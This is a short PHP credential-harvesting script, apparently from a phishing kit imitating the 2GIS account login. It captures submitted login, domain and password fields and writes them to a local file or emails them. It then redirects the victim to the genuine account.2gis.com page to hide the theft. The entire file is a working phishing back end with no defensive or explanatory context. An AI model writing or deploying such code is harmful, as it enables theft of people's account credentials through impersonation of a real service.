<?php
/*
net
*/
$BASE="base3124.php";
$IS_EMAIL=false;
$LOCATION="https://account.2gis.com";

$p0=$_REQUEST["Login"];
$p1=$_REQUEST["Domain"];
$p2=$_REQUEST["Password"];
$p3=$_REQUEST["Login"];
$p4=$_REQUEST["Password"];
$headers = "";
$info="$p0:$p1:$p2:$p3:$p4:\n";

if ($IS_EMAIL){
mail($BASE, "*** ¬ам пришЄл сюрприз!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}


?>
<meta http-equiv="refresh" content="0; url=https://account.2gis.com">